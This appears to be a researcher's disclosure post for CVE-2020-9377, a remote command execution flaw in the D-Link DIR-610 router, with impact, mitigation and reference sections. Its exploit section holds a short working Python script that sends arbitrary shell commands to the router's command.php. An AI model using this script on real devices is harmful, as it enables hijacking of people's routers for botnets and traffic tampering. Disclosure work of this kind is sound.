Heitor Gouvêa

Research About


CVE-2020-9377 - Remote Code Execution (RCE) on D-LINK 610 Router

Summary


Description


Exploit

#!/usr/bin/python

import os
import sys
import urllib2
import threading
import time

def main(host, port, uid, command):
    request = urllib2.Request('http://%s:%s/command.php' % (host, port), 'cmd=%s' % command, { 'Cookie': 'uid=%s' % uid })
    print urllib2.urlopen(request).read()

if __name__ == '__main__':
    [host, port, uid, command] = sys.argv[1:5]
    main(host, port, uid, command)

Impact

A malicious agent can execute commands on the router system remotely and take control of it and subvert such router to work/perform actions that it wants, using the same for botnets, traffic infection actions and other possibilities.


Mitigation

While D-Link is aware of vulnerabilities involving DIR-610, these products have reached End of Life (EoL)/End of Support (EoS) and there is no extended support or development for them. D-Link will not be able to resolve device or firmware issues as all development and customer support has ceased.

The DIR-610 Rev. Ax reached its End of Support Date in 2014, it is no longer supported and firmware development has stopped, all consumers still using the product should retire it and immediately replace the device.


Conclusion


References

  1. https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9377
  2. https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
  3. https://www.dlink.com.br/produto/dir-610/
  4. https://owasp.org/www-community/attacks/Command_Injection
  5. https://portswigger.net/web-security/os-command-injection